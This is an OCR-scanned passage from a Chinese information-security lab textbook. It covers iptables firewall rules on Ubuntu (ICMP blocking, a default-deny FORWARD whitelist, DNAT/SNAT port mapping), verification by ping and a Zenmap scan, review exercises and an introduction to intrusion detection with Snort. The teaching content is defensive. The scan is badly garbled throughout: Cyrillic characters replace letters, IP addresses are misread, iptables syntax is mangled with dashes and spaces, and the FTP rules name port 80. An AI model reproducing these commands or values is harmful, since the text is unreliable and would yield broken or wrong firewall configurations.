target prot opt source 
DROP. icmp -- 6.6.6.6/9 


Chain FORWARD (policy ACCEPT) 
target prot opt source 


Сһаїп OUTPUT (policy ACCEPT) 
target prot opt source 
kyogkyo-ubuntu:-S 目 


iptables 


$ sudo iptables - 
$ sudo iptables - 


图 8.37 


ping 通 192. 168. 1. 20 


Linux 可 以 ping Windows. {Н Ж fù Е Window 
Linux。 配 置 防火 墙 规则 以 落实 安全 策略 ,可 通过 向 INTPUT 表 中 添加 相应 


А 


INPUT 


р icmp 


INPUT -p icmp 


-n 


destinatton 
6.6.6.6/9 


destination 


destination 


图 8.38 


їстїр-їуре echo-request 


--icmp-type echo-request -j DROP 


icmptype 8 


添加 防火 墙 规则 2 


s 用 户 ping 
包 过 滤 规 则 
j DROP. 如 


(2) 在 防火 墙 所 在 主机 上 进行 测试 ,可 以 看 到 能 ping iÑ 19 


所 示 。 


Фе © kyo@kyo-ubuntu: ~ 
kyo@kyo-ubuntu 
kyo@kyo-ubuntu:~$ sudo iptables 
Chain INPUT (policy ACCEPT) 
prot opt source 
icmp -- 0.0.0.0/0 


Chain FORWARD (policy ACCEPT) 
target prot opt source 


Chain OUTPUT (policy ACCEPT) 
target prot opt source 


-n 


$ sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP 


destination 


D icmptype 8 


destination 


destination 


lkyogkyo-ubuntu:-$ ping 192.168.1.55 -c 5 
.168.1.55 (192.168.1.55) 56(84) bytes of data. 


from 192.168.1. 
from 192.168.1 
from 192.168.1 
from 192.168.1. 
from 192.168.1 


icmp seq-1 ttl-128 
icmp seq-2 ttl-128 
icmp seq-3 ttl-128 
icmp seq-4 ttl-128 
icmp seq-S ttl-128 


.55 ping statistics - 
5 packets transmitted, 5 received，6% packet loss, time 3997ms 
rtt RUD чш = 0.150/0.198/0.362/0.083 ms 


kyo@kyo-ubuntu:~$ 


(3) 在 Windows 主机 


上 进行 


则 试 ,可 以 看 到 不 
所 示 , 由 此 可 见 刚刚 创建 的 防火 墙 规则 奏 


time-0. 
time=0. 
time=0. 
time=0. 
time=0. 


ping 3 192. 168. 1. 55 


192.168.1.2@ with 32 bytes of data: 


timed out. 
timed out. 
timed out. 
timed out. 
Ping statistics for 
Packe: 


|С: Documents and Settin: 


192.168.1.20: 


Sent = 4, Received = B, Lost 


wall.MAO>, 


Ё ping 192 


防火 墙 


,如 图 8. 39 


. 168. 1. 20, 如 图 8. 40 


图 8.40 


Windows 主机 ping 失败 
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8.5 网 络 防火 墙 配置 实验 


8.5.1 实验 目的 


通过 iptables 对 防火 墙 进行 配置 ,构建 基于 Ubuntu 系统 的 网 络 防火 墙 , 以 实现 对 网 
络 流量 的 监控 和 审查 ,掌握 网 络 防 火 墙 的 主要 功能 和 配置 方法 ,理解 包 过 滤 和 代理 技术 的 


原理 。 
8.5.2 实验 内 容 及 环境 
1. 实验 内 容 


熟练 配置 iptables 以 实现 如 下 功能 : 

(1) 允许 外 网 访问 特定 内 部 网 站 ; 

(2) 禁止 外 网 对 内 部 网 络 的 扫描 ; 

СЗ) 将 防火 墙 配置 为 内 部 网 站 的 МАТ 代理 ,以 实现 МАТ 交换 。 

2. 实验 环境 

利用 Ubuntu 系统 虚拟 主机 模拟 网 络 防火 墙 .利用 iptables 对 防火 墙 进行 配置 。 同 
时 ,利用 四 台 虚 拟 主机 构建 内 、 外 网 络 。 分 别 为 内 网 Web 服务 器 、 内 网 FTP 服务 器 、 内 网 
主机 和 外 网 主机 。 构 建 网 络 防火 墙 实验 网 络 的 拓扑 结构 ,如 图 8. 41 所 示 。 


10.10.10.20 10.10.10.33 
Web 服 务 器 FTP 服 务 器 
10.10.10.1 
外 网 主机 
y 172.16.16.1 y’ 
192.168.1.1 BARAKI SS 


172.16.16.4 


192.168.1.2 
图 8.41 网 络 拓扑 示意 图 


#85 PNR T 


8.5.8 实验 步骤 


1. 配置 路 由 转发 功能 


(1) 在 Ubuntu 虚拟 机 系统 生成 时 添加 3 块 网 卡 ,并 配置 网 络 接口 ,设置 连接 模式 为 
Bridge 模式 ,如 图 8. 42 所 示 。 


虚拟 机 设置 
硬件 | 选项 
em ax 设备 状态 
mp5 268 Пай ҥк© 
Em i I gusti CO) 
2ана (5с5) 60 GB z 
&jCD/DVD (SATA) “自动 检测 网 络 连 接 
L-. E 桥接 模式 (自动 © 桥 接 模式 (B): 直接 连接 物理 网 络 
网 络 适配器 2 桥接 模式 (自动 ) а 理 网 络 连 ; р; 
网 网 络 适配器 3 桥接 模式 (自动 ) aum жерн 
USB 控制 器 存在 © NAT 模式 (N): 用 于 共享 主机 的 TP 地 址 
OEE 自动 检测 © 仅 主机 模式 (H): 与 主机 共享 的 专用 网 络 
Bins Bie © 自 定义 (U): 特定 虚拟 网 络 
VMneto (自动 桥接 ) -J 
© LAN RAW: 
=) 
LAN ЕИ)... 


RIA...) [RR 


图 8.42 Ubuntu 添加 3 块 网 卡 


(2) 配置 3 块 网 卡 的 IP 地 址 。 内 网 主机 区 IP 地 址 为 192. 168. 1. 1, 子 网 掩 码 IP 地 
址 为 255. 255. 255. 0 ,网关 IP 地 址 为 192. 168. 1.1, 如 图 8.43 所 示 。 

G) 配置 内 网 服务 器 区 IP 地 址 为 10. 10. 10.1, 子 网 掩 码 IP 地 址 为 255. 255. 255.0, 
网 关 IP 地 址 为 10. 10. 10. 1, 如 图 8.44 所 示 o 

(4) 外 网 区 IP 地 址 为 172. 16. 16. 1 , 子 网 掩 码 IP 地 址 为 255. 255. 255. 0 ,网关 IP 地 
址 为 172. 16. 16. 1. ln El 8. 45 所 示 。 

(5) 配置 完成 3 块 网 卡 后 , 需 设 置 Ubuntu 的 路 由 转发 功能 ,以 实现 内 、 外 网 之 间 的 
通信 。 

在 /usr/bin 目录 下 新 建 一 个 脚本 文件 router, 脚 本 内 容 为 : 


ч 


入 Jp /信息 系统 安全 实验 教程 


连接 名 称 (N) : DE 


常规 以 太 网 802.1X 安 全 性 ”IPv4 设 置 “IPv6 设 置 


方法 (M) : | 手动 ы 
地 址 
地 址 FARE 网 关 添加 (A) 
172.16.16.1 255.255.255.0 172.16.16.1 BR (D) 
DNS 服务 器 : [= 
mmu: po———— 


DHCP 客户 端 ID : 
Г) 需要 IPv4 地 址 完成 这 个 连接 
路 由 (R)… 


取消 (QO 保存 (3)… | 


图 8.45 外 网 区 


连接 名 称 (N) : “| 内 网 主机 区 连接 名 称 (N) : | 
常规 以 太 网 802.1X 安 全 性 ”IPv4 设 置 “IPv6 设置 常规 以 太 网 802.1X 安 全 性 ”IPv4 设 置 | IPv6 i 
AAM): | 手动 М 方法 (M) : | 手动 ы 
地 址 地 址 
地 址 子 网 掩 码 网 关 添加 (A) 地 址 FARB 网 关 || 添加 (A) 
192.168.1.1 255.255.255.0 192.168.1.1 删除 (D) 10.10.10.1 255.255.255.0 1010107) 删除 (D) ] 
DNS 服务 器 : [ ] DNS 服务 器 : 
搜索 域 (E) : С ) 搜索 域 (E) : ) 
DHCP 客户 端 ID DHCP 客户 端 ID 
O 需要 IPv4 地 址 完成 这 个 连接 O 需要 IPv4 地 址 完成 这 个 连接 
路 由 (R).… 路 由 (R).… 
取消 (C) || 保存 (S)… 取消 (C) | | 保存 (S).… | 
图 8.43 内 网 主机 区 图 8.44 内 网 服务 器 区 
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echo "1"> /proc/sys/net/ipv4/ip forward // 开 启 路 由 功能 
echo "ok" 


ТЕ / etc/ rc. local 文件 中 添加 代码 ,指向 router 脚本 ,代码 如 下 : 


/usr/bin/router 
exit 0 


(6) 在 内 网 服务 器 10. 10. 10. 20 上 启动 HIS. 28 iE Web 服务 器 ,架设 方法 参见 第 7 
3 ,允许 内 、 外 网 主机 访问 ,如 图 8. 46 一 图 8. 50 所 示 。 


ГЕТЕ па) "b EI 
-- ош хра в . 

ines one а 

Более E = 


图 8.46 开启 内 网 Web 服务 


icrosoft Windows ХР [版 本 5.1.26001 
УРТ 1985-2001 Microsoft Corp. 


:NDocuments and Settings\fwall1.MHhO>ping 10.18.10.20 


inging 10.10.10.20 with 32 bytes of data: 


time=118ms TTL=127 

time<íms TTL=127 
10.10.18.20: time=5ms TTL=127 
18.10.18.28: bytes=32 &1те<1тз IIL=127 


statistics for 10.10.10.20: 

Packets: Sent = 4, Received = 4, Lost = 8 «8x loss), 
Approximate round trip times in nilli-seconds: 

Mininun = Üns, Maxinun = ii8ns, Average = 3ðns 


:NDocunents and Settings fwall.MAO> 


图 8.47 内 网 主机 第 1 次 ping 通 内 网 Web 服务 器 
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图 8.48 


内 网 主机 第 1 次 浏览 内 网 Web 服务 器 


Pinging 180.180.10.29 with 32 bytes of data: 


Reply from 10.10.10.20: byte 
Reply from 10.10.10.20: 
Reply from 10.10.10.20: byte 


[Reply from 10.10.10.20: bytes 


bytes=32 tineXims 


2 time《lms TIL=127 
TTL=127 
TIL-127 
TTL=127 


2 time<linms 
2 Єіте<1т= 


[Ping statistics for 10.10.10.20: 


Packets: Sent = 


Approximate round trip tines 


Minimum = 8ns, Maximum 


图 8.49 


4, Received = 4, Lost 


= 8 (Øx loss), 
in milli-seconds: 
Bns, Average = Bns 


外 网 主机 第 1 次 ping 通 内 网 Web 服务 器 
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C 


图 8.50 外 网 主机 第 1 次 浏览 内 网 Web 服务 器 


(7) 在 内 网 服务 器 10. 10. 10. 33 上 启动 IIS, 架 设 FTP 服务 器 ,架设 方法 参见 第 7 


章 ,允许 内 、 外 网 主机 访问 ,如 图 8. 51、 图 8.52 所 示 。 


:Documents and Settings\fwall.-MhO>ping 10.10.10.33 
[Pinging 10.10.10.33 with 32 bytes of data: 


Нер1у from 10.10. 
|Ннер1у from 10.10. 
Reply from 10.10. 
Reply from 10.10. 


ing statistics for 18.18.10.33: 
: Received - 4, 


Approximate Р: і in mill 
Minimum = &k Maximum = Øms, fAverage = 


:\Documents and Settings fuall.MAO> 


图 8.51 外 网 主机 第 1 次 ping 通 内 网 FTP 服务 器 


2. 配置 包 过 滤 防 火 墙 规则 


内 网 Web 服务 器 为 内 、 外 网 提供 Web 服务 ,内 部 FTP 服务 器 仅 为 内 网 提供 FTP 服 
务 ,由 此 指定 安全 策略 如 下 : 只 允许 外 网 主机 访问 Web 服务 器 ,不 允许 访问 FTP 站 点 和 
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OCEN 
1 оная O хдҥлия C WFH 一] TARE E) ex RATER 


sana 


首页 / 


trer otz- Bron 
文件 名 .扩展 名 大 小 修改 时 间 Bd 
) росі кй | 20191221 14:53:95 o 


MipFleServer 2.3 bta AIEE 
BEBIN 201.1221 150023 
жамы 00:10:59 


图 8.52 外 网 主机 第 1 次 浏览 内 网 FTP 服务 器 


内 网 主机 ; 内 网 主机 可 与 Web 服务 器 .FTP 站 点 通信 。 该 安全 策略 属于 默认 禁止 策略 ， 
防火 墙 规则 可 采用 白 名 单 的 方式 进行 配置 。 
CD 查看 当前 防火 墙 规则 情况 ,可 以 看 到 目前 无 规则 ,如 图 8.53 所 示 。 


OOO kyo@kyo-ubuı 

kyo@kyo-ubuntu:~$ sudo iptables -L -n 

[sudo] password for kyo: 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 


Chain FORWARD (poLicy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
kyo@kyo-ubuntu:~$ | 


图 8.53 Ubuntu 防火 墙 默认 无 规则 
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(2) 配置 防火 墙 规则 以 落实 安全 策略 .“ 外 网 主机 可 以 访问 Web 站 点 但 不 能 访问 
FTP 服务 器 ,可 通过 向 FORWORD 表 中 添加 相应 外 网 和 Web 服务 器 间 的 包 过 滤 规 则 
实现 ,具体 命令 如 下 : 


iptables — A FORWARD — s 0/0 -d 10.10.10.20/32 -p tcp - dport 80 - j ACCEPT 
// 人 多 许 内 、 外 网 的 主机 访问 内 网 Web 服务 器 80 端口 

iptables — A FORWARD —5 10.10.10.20/32 -d 0/0 -p tcp - sport 80 - j ACCEPT 
// 人 允许 内 网 Web 服务 器 响应 内 、 外 网 主机 的 请 求 

iptables — A FORWARD – s 192.168.1.0/24 -d 10.10.10.33/32 -p tcp -dport 80 – j ACCEPT 
// 人 允许 内 网 主机 访问 内 网 FTP 服务 器 80 端口 

iptables — A FORWARD - s 10.10.10.33/32 -d 192.168.1.0/24 -p tcp - sport 80 — j ACCEPT 
// 人 允许 内 网 ETP 服务 器 响应 内 网 主机 的 请 求 


默认 禁止 策略 ,所 有 不 匹配 到 上 述 规则 的 数据 包 均 被 丢弃 ,具体 命令 如 下 : 
Iptables — P FORWARD DROP 
规则 设置 过 程 如 图 8. 54 所 示 。 


root@kyo-ubuntu:~# iptables -A FORWARD -5 9/0 -d 19.16.10.20/32 -p tcp --dport 80 -j ACCEPT 
yo-ubuntu: ~# iptables -A FORWARD -5 10.10.10.20/32 -d 0/0 -p tcp --sport 80 -j ACCEPT 
2.168.1.0/24 -d 10.10.10.33/32 -p tcp --dport 80 -j ACCEPT 
10.10.33/32 -d 192.168.1.0/24 -p tcp --sport 80 -j ACCEPT 
Р FORWARD DROP 

root@kyo-ubuntu:~# iptables -L -n 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 


Chain FORWARD (policy DROP) 
prot opt source destination 
tcp 9.0.0.0/0 10.10.10.20 tcp dpt:80 
tcp 10.10.10.20 6.6.6.6/9 tcp spt:80 
tcp 192,168,1,0/24 19.19.19.33 tcp dpt:80 
tcp 10.10.10.33 192.168.1.6/24 tcp spt:80 


|Chain OUTPUT (policy ACCEPT) 


target prot opt source destination 
root@kyo-ubuntu:~# 


图 8.54 添加 Ubuntu 防火 墙 规则 


3. 包 过 滤 规 则 配置 验证 
CD 当 完 成 防火 墙 规则 配置 后 ,内 网 主机 可 以 正常 访问 Web 服务 器 和 FTP 服务 器 ， 
结果 如 图 8. 55、 图 8. 56 所 示 。 
(2) 内 网 主机 ping Web 服务 器 .FTP 服务 器 失败 ,如 图 8. 57、 图 8. 58 所 示 。 
(3) 外 网 主机 可 以 正常 访问 Web 站 点 提供 的 HTTP 服务 ,但 是 采用 ping 命令 方式 
无 法 访问 Web 主机 ,如 图 8. 59、 图 8. 60 所 示 。 


«p 
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图 8.55 内 网 主机 第 2 次 浏览 内 网 Web 服务 器 


Ө /的 索引 x + 
€ > С © FES | ftp://10.10.10.33 


/ 的 索引 


* Ө 


名 称 大 小 修改 日 期 
Ы pics/ 2019/11/16 上 午 5:36:00 


图 8.56 内 网 主机 第 2 次 浏览 内 网 FTP 服务 器 


:Vping 1@.1@.18.1 


nging 18.10.18.1 with 32 bytes of data: 


180.18.10.1: bytes-32 tineCins 
10.18.10.1: bytes-32 tineXins 
18.18.18.1: bytes tineXins 
18.18.18.1: bytes tineXins 


ping statistics for 19.18.18. 
Packets: Sent = 4, Received = 4, Lost = Ө (0х loss), 
approximate round trip tines in nilli-seconds 
Minimum = аз, Maximum = Ваз, Average = пз 


>ping 10.10.18.20 
-10.18.28 with 32 bytes of data: 
out. 
out. 
out. 


equest ti out. 


Ping statistics for 10.10.10.20: 
Packets: Sent = 4, Received = 8, Lost = 4 (108% loss), 


С: >>, 


防火 墙 


图 8.57 内 网 主机 ping 内 网 Web 服务 器 失败 


eply from 1@.1@.1@.1: bytes=32 tineCins 
eply fron 19.19.19.1: bytes=32 tine<lns 
eply from 10.18.10.1: bytes-32 tineCins 
eply from 19.19.19.1: bytes=32 tineCins 


ing statistics for 18.10.10. 
Packets: Sent = 4, Received = 4, Lost = @ (0х los 
fipproximate round trip times in milli-seconds: 
Minimun = Ваз, Maximum = Bns, Average = Bns 


:Vping 10.18.10.33 
18.18.10.33 with 32 bytes of data: 
timed out. 

equest tined out. 


Request timed out. 
equest timed out. 


ng statistics for 18.10.10.33: 
Packets: Sent = 4, Received = 0, Lost = 4 (100х M CEE 


A 


图 8.58 内 网 主机 ping 内 网 FTP 服务 器 失败 
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图 8.59 外 网 主机 第 2 次 浏览 内 网 Web 服务 器 


RDOWS\s7stea32Vcad. ехе 


-10.20 with 32 bytes of data: 


out. 
out. 
out. 
out. 


[Ping statistics for 180.18.10.20: 
Packet Sent 4, Received 8. Lost 


:NDocuments and Settings fwall.M&O» 


4 (1098x loss), 


图 8.60 外 网 主机 ping 内 网 Web 服务 器 失败 


(4) 外 网 主机 尝试 ping 并 登录 FTP 服务 器 ,发 现 拒绝 连接 ,结果 如 
所 示 。 这 是 因为 所 有 未 匹配 上 ACCEPT 规则 的 数据 包 将 被 拦截 并 丢弃 ， 
问 内 部 Web 站 点 提供 的 HTTP 服务 ,而 不 能 访问 内 网 主机 及 其 他 服务 。 
(5) 外 网 主机 利用 Zenmap 对 Web 站 点 进行 扫描 ,发 现 只 


浅 过 滤 规 则 将 其 他 的 数据 包 全 都 过 滤 掉 了 ,如 图 8.63 所 示 。 


图 8. 61、 图 8.62 
外 网 主机 只 能 访 


有 80 端口 开放 ,说 明 防 火 


172.16.16.1: bytes-32 tine-ins 
Reply from 172.16.16. tineXins 
eply fron 172.16.16. tine-ins 
[Reply from 172.16.16.1: bytes-32 time<lms 


[Ping statistics for 172.16.16.1: 
Packets: Sent = 4, Received = 4, Lost = 8 «84 loss), 
Approximate round trip times in nilli-seconds: 
Mininun = Bms, Maximum = ims, Average = Bms 


:NDocuments and Settings>fvall.MAO>ping 10.10.10.1 


inging 10.10.10.1 with 32 bytes of даба: 


[Reply from 


1@.1@.1: bytes-32 time<lms TIL-64 
time<ims TTL=64 

[Reply from 10.10.10.1 time<lms 

[Reply from 1@.1@.1@.1: bytes=32 time<lms 


statistics for 10.10.10.1: 
4, Received = 4, Lost = Ø (8x loss), 
Approximate round trip times in milli-seconds: 
Mininun = Ваз, Maximum = Øms, Average = пз 


:Docunments апа Settings\fuall.MAO>ping 10.10.10.33 


180.10.10.33 with 32 bytes of data: 


timed 
timed 


out. 
out. 
out. 
out. 


Sent = 4, Received B., Lost = 4 (108z los 


:\Docunents and Settings fwall. MAO) m 


4. 配置 防 


E 


为 了 配置 防火 墙 NA 


ШТ: 


iptables -F 
iptables - X 
iptables – 2 


图 8. 61 


NAT 转换 功能 


iptables – Е nat -F 
iptables -t nat -X 
iptables -t nat -Z 


iptables — P FORWARD ACCEPT 


外 网 主机 ping 内 网 FTP 服务 器 失败 


防火 墙 


T 转 换 功 能 ,首先 需要 清除 上 面 场景 中 的 防火 墙 过 滤 规 则 ,命令 
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图 8.62 外 网 主机 第 2 次 浏览 内 网 FTP 服务 器 失败 


Scan Tools Profle Нер 


Target: [10 10 10 20/32 Profile: [Intense seun 


Conmandi [шар -T4 -A -v 10. 10. 10.20/32 


Hosts J| Services Заар Output Ports / Nosts| Topology] Host Details] Scans] 
TEM esp -T4 -A -v 10. 10. 10.20/32 
^ 10101020 


Starting Nmap 6.40 ( http://nmap.org ) at 2018-12-23 10:30 中 国标 准时 间 
NSE: Loaded 110 scripts for scanning. 

NSE: Script Pre-scanning. 

Initiating Ping Scan at 10:30 

Scanning 10.10.10.20 [4 ports] 

Completed Ping Scan at 10:30, 0.08s elapsed (1 total hosts) 
Initiating SYN Stealth Scan at 10:30 

Scanning 10.10.10.20 [1080 ports] 


Completed SYN Stealth Scan at 10:30, 4.265 elapsed (1000 total ports) 

Initiating Service scan at 10:30 

Scanning l service on 10.10.10.20 

Completed Service scan at 10:30, 8.753 elapsed (1 service on 1 host) 

Initiating 03 detection (try #1) against 10.10.10.20 

mass dns: varning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system- 
dns or specify valid servers with --dns-servers 

Initiating Traceroute at 10:30 

Completed Traceroute at 10:30, 0.03s elapsed 

WSE: Scrip gramuing 10.10.10.20. 

Initiating NSE at 10:30 

Completed NSE at 10:31, 8.193 elapsed 

Ивар scan report for 10.10.10.20 

Most is wp (0.00s latency). 

Wot shom: 999 filtered ports 

PORT STATE SERVICE VERSION 

S0/tcp open http Microsoft IIS Mttpd 5.1 

| http-methods: OPTIONS TRACE GET HEAD COPY PROPFIED SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL 
PROPPATCH 

| Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH 
I See http: //nmap.org/nsedoc/scripts/http-methods.htal 

I http-title: VXDSVxFDVxDAVXDAVXEDVxAS VxC9 VXES VD VxDO. 

Varning: OSScam results вау be unreliable because ve could not find at least 1 open and 1 closed port 
Device type: gemeral purpose 

Running: Microsoft Windows 20001ХР 


图 8.63 Zenmap 扫描 内 网 Web 服务 器 
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配置 过 程 如 图 8. 64 所 示 。 


root@kyo-ubuntu: ~ 

root@kyo-ubuntu iptables - 

root@kyo-ubuntu iptables - 

root@kyo-ubuntu iptables - 

root@kyo-ubuntu iptables - 

root@kyo-ubuntu iptables - 

root@kyo-ubuntu iptables - 

root@kyo-ubuntu:~# iptables - 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
rootQkyo-ubuntu:-& | 


图 8.64 清除 防火 墙 所 有 规则 


防火 墙 过 滤 规 则 清除 后 ,Web 站点、FTP 站 点 均 可 与 外 网 主机 进行 通信 。 

防火 墙 NAT 转换 功能 的 目标 是 向 外 发 布 Web 网 站 地 址 为 外 网 地 址 172. 16. 16.1. 
利用 防火 墙 进行 NAT 转换 ,以 实现 向 外 网 屏蔽 内 网 信息 。 

(1) 将 进入 访问 Web 服务 器 的 数据 包 进 行 目的 IP 地 址 映射 ,具体 映射 根据 端口 号 
建立 映射 表 , 命 令 如 下 : 


iptables - t nat — A PREROUTING - d 172. 16.16.1 - p tcp - dport 80 - j DNAT - to 
destination 10.10.10.20 


(2) 将 离开 内 网 的 数据 包 进 行 源 IP 地 址 映射 ,具体 命令 如 下 : 
iptables – t nat - A POSTROUTING — s 10.10.10.0/24 - j SNAT — to- source 172.16.16.1 


由 此 ,完成 了 Web 服务 器 的 防火 墙 NAT 转换 功能 的 配置 ,如 图 8. 65 所 示 。 

5. МАТ 转换 功能 实验 验证 

当 外 网 主机 访问 Web 站 点 时 ,在 路 由 器 关口 通过 NAT 映射 将 目的 地 址 改 为 Web 站 
点 地 址 ,从 而 为 外 网 主机 提供 HTTP 服务 。 对 于 不 同 的 服务 ,可 根据 端口 号 的 不 同 将 其 
映射 到 不 同 的 IP 地 址 主机 上 ,外 网 主机 通过 HTTP 访问 网 关 。 

修改 内 网 Web 服务 器 的 配置 文件 ,把 默认 的 hostUrl 改 为 172. 16. 16. 1, 如 图 8. 66 
BUR o 

外 网 主机 ping 通 外 网 Web 服务 器 ,如 图 8. 67 所 示 。 

外 网 主机 浏览 Web 服务 器 ,如 图 8. 68 所 示 。 
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root@kyo-ubuntu:~# iptables -t nat -A PREROUTING -d 172.16.16.1 -p tcp --dport 80 -j DNAT --to-destination 10.10.10.20 
root@kyo-ubuntu:~# iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -j SNAT --to-source 172.16.16.1 
root@kyo-ubuntu:~# iptables -t nat -L 
Chain PREROUTING (policy ACCEPT) 
prot opt source destination 
tcp -- anywhere 172.16.16.1 tcp dpt:http to:10.10.10.20 


ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 


Chain POSTROUTING (policy ACCEPT) 

target prot opt source destination 

Em all 10.10. 10.0/24 anywhere to:172.16.16.1 
root@kyo-ubuntu: 


图 8.65 配置 防火 墙 NAT 转换 功能 


В host. ini - BFA E] 
LPO REO ESO EWV WHW 

[1оса1їлөзї] 

|hostLanguage-UBScript 

покое С 

listenPort-80 


rootPath-Wwwroot si сево 
|deFaultFiles-index.asp,default.asp, index.html, deFault.html 


[1ocalhost:8001] 
hostLanguage-UBScript 

hostürl-localhost 

listenPort-8001 

rootPath-XuwurootVsiteB001 
|deFaultFilessindex.asp,default.asp,index.html,deFault.html 


[1ocalhost:8002] 
IhostLanguage-UBScript 


Ihostür1-localhost 
listenPort-8002 

|rootPath-VwurootVsite& 082 
|deFaultFiles-index.asp,default.asp, index.html, deFault.html 


图 8.66 修改 内 网 Web 服务 器 默认 地 址 
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:Vping 172.16.16.1 


inging 172.16.16.1 with 32 bytes of data: 


eply from 172.16.16.1: bytes-32 time<ims TTL=64 
172.16.16.1: 2 єїте<1тз TIL-64 
172.16.16.1: 2 єїте<1тз TTL=64 
Reply from 172.16.16.1: bytes-32 timeXims TTL=64 


ing statistics for 172.16.16.1: 
Packets: Sent = 4, Received = 4, Lost = B (0х loss), 
pproximate round trip times in milli-seconds: 
Minimum = пс, Maximum = дас, Average = Bns 


IN), 


图 8.67 外 网 主机 ping 通 外 网 Web 服务 器 


INO up аву 历史 EU ТАФ MBW 


€ ёте! 


期 访问 最 多 хилл жк} жин C) HIS ATAR 


Bootstrappin 


: BIG 


Welcome 


Message 


Ingenious marketing copy. And some more 
ingenious marketing copy. 


Features 


图 8.68 外 网 主机 浏览 Web 服务 器 
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8.6 Ж 习 题 


CD 在 8. 4 节 的 实验 中 ,车 对 常见 的 网 络 功能 进行 限制 该 如 何 设置 ,如 对 FTP、 远 程 
控制 .QQ 服务 等 网 络 功 能 进行 限制 。 

(2) 在 8.5 节 实 验 中 ,常见 的 情形 是 允许 外 部 主机 对 Web 服务 器 进行 网 络 诊断 
(ping) 和 HTTP 服务 访问 ,而 禁止 外 部 主机 对 内 网 的 其 他 访问 ,请 进行 规则 设置 并 检验 
效果 。 

G) 如 果 在 规则 设置 中 有 两 条 规则 是 相互 矛盾 的 ,比如 前 一 条 是 禁止 通过 某 个 端口 ， 
后 一 条 是 打开 这 个 端口 ,请 问 会 出 现 什 么 情况 ? 请 给 出 实验 证 明 。 
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9.1 概 Ж 


入 侵 检测 是 通过 对 计算 机 中 若干 关键 点 信息 的 收集 和 分 析 , 从 中 发 现 网 络 或 系统 中 
是 否 有 违反 安全 策略 的 行为 和 被 攻击 迹象 的 一 种 安全 技术 。 入 侵 检测 被 认为 是 防火 墙 之 
后 的 第 二 道 安全 屏障 ,在 不 影响 或 较 少 影响 网 络 性 能 的 情况 下 对 网 络 进行 监测 ,提供 对 内 
部 攻击 、 外 部 攻击 和 误 操作 的 实时 检测 。 


9.2 入 侵 检 测 技 术 


9.2.1 入 侵 检 测 原理 


常用 的 人 侵 检测 技术 包括 误 用 检测 和 异常 检测 。 

1. 误 用 检测 

误 用 检测 需要 根据 入侵 的 特征 进行 匹配 ,所 以 误 用 检测 也 称 为 特征 检测 。 其 典型 过 
程 是 根据 已 知 的 攻击 建立 检测 模型 ,将 待 检 测 数据 与 模型 进行 比较 ,如 果 能 够 匹配 检测 模 
型 , 则 认为 是 攻击 行为 。 

误 用 检测 的 方法 是 模式 匹配 ,将 每 一 个 已 知 的 入 侵 事 件 或 系统 误 用 定义 为 一 个 独立 
的 特征 (如 端口 扫描 的 典型 特征 是 在 短 时 间 内 目标 主机 收 到 发 往 不同 端 口 的 TCP SYN 
包 ), 所 有 定义 的 特征 构成 一 个 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 。 应 用 模式 匹配 进 
行人 侵 检测 的 信息 分 析 时 ,入 侵 检测 系统 会 将 收集 到 的 信息 与 这 个 已 知 的 网 络 入 侵 和 系 
统 误 用 模式 数据 库 进 行 比 较 , 从 中 找到 那些 违背 安全 策略 的 行为 。 当 检测 的 用 户 或 系统 
行为 与 库 中 的 记录 相 匹 配 时 ,系统 就 认为 这 种 行为 是 入 侵 行 为 。 

误 用 检测 技术 能 够 很 好 地 发 现 与 已 知 攻击 行为 具有 相同 特征 的 攻击 ,检测 已 知 攻击 
的 正确 率 很 高 。 主 要 问题 是 不 能 发 现 新 的 攻击 类 型 ,甚至 不 能 发 现 同一 种 攻击 的 变种 , 因 
此 存在 漏 报 的 可 能 性 非常 大 ,同时 维护 规则 的 代价 也 比较 高 。 

2. 异常 检测 

异常 检测 方法 主要 假定 人 侵 者 的 行为 与 正常 用 户 的 行为 不 同 ,利用 这 些 不 同 可 以 检 
测 入 侵 行 为 。 异 常 检测 是 对 正常 行为 建 模 , 可 以 根据 用 户 行 为 的 一 些 统计 信息 来 判断 系 
统 的 不 正常 使 用 模式 ,从 而 发 现 伪装 者 。 在 假定 正常 行为 与 攻击 行为 存在 本 质 差 别 的 情 
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况 下 ,通过 分 析 正 常 连接 的 统计 特性 建立 检测 模型 ,将 待 检测 行为 与 统计 模型 进行 比较 ， 
如 果 能 够 匹配 上 , 则 判断 该 行为 是 正常 行为 。 根 据 异常 检测 的 实现 思路 ,这 种 技术 有 能 力 
发 现 未 知 攻击 ,但 是 这 种 技术 普遍 存在 误 报 率 高 的 特点 。 


9.2.2 入 侵 检 测 的 部 署 


入 侵 检测 系统 的 可 靠 性 和 准确 性 在 很 大 程度 上 依赖 于 所 收集 信息 的 可 靠 性 和 完备 
性 。 因 此 ,入 侵 检 测 系统 在 部 署 时 应 重点 考虑 数据 来 源 的 可 靠 性 与 完备 性 。 根 据 入 侵 检 
测 的 数据 来 源 , 和 人 侵 检测 系统 分 为 基于 主机 的 和 人 侵 检测 系统 、 基 于 网 络 的 入侵 检测 系统 和 
混合 型 人 侵 检 测 系统 。 基 于 主机 的 入 侵 检 测 系统 安装 到 所 有 需要 入 侵 检测 保护 的 主机 
Es 基于 网 络 的 入 侵 检测 系统 一 般 安装 在 需要 保护 的 网 段 中 ,实时 监控 网 段 中 传输 的 各 
种 数据 包 ,并 对 这 些 数据 包 进 行 分 析 和 检测 。 混 合 型 入 侵 检 测 系统 则 是 上 述 两 种 模式 的 
混合 应 用 。 


9.3 Snort 的 配置 及 使 用 实验 


9.3.1 实验 目的 
掌握 入 侵 检 测 系统 Snort 的 工作 原理 和 规则 设置 方法 。 
9.3.2 实验 内 容 及 环境 


1. 实验 内 容 

搭建 人 侵 检 测 系统 Snort, 配 置 和 人 侵 检 测 规则 。 

